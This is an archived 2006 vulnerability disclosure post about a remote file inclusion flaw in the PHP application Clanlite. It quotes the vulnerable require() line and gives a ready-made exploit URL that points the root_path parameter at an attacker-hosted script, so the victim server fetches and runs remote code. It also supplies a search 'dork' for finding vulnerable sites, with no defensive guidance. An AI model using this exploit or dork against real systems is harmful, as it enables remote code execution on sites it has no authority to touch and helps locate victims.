Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

GEPI <= 1.4.0 gestion/savebackup. php Remote File Include Vulnerability

[ECHO_ADV_56$2006] P-Book <= 1.17 (pb_lang) Remote File Inclusion

HITWEB Remote File Include

jamroom Remote File Include

From:	x_w0x <x_w0x_(at)_hotmail.com>
Date:	31.10.2006
Subject:	Clanlite Remote File Include

#################################
# Clanlite                                #
#################################
#Class:     Remote|Local File Include Vulnerability
# Remote:    Yes
# Local:     No
# Type:      High
#site:http://www.clanlite.org
#Download :http://www.comscripts.com/scripts/php.clanlite.1520.html
# Author:    x_w0x
# Contact:   x_w0x@hotmail.com
###################################
#Vuln Code
=================conf-php.php================
in line 3 and 5
require($root_path.'conf/session.php');

####################################

£xploit:

http://www.victim.com/[path]/conf-php.php?root_path=http://DarknesseScript.txt

######

#Dork : "inurl: Clanlite "


#Gr££tz:makoki, azzcoder,xoron,osm@n
#Speciale gr££tz: str0k, and elite-team
=========================
#w£lc0m£ In x0|0x
#by x_w0x
############################################################

_________________________________________________________________
MSN Messenger: appels gratuits de PC à PC !
http://www.msn.fr/msger/default.asp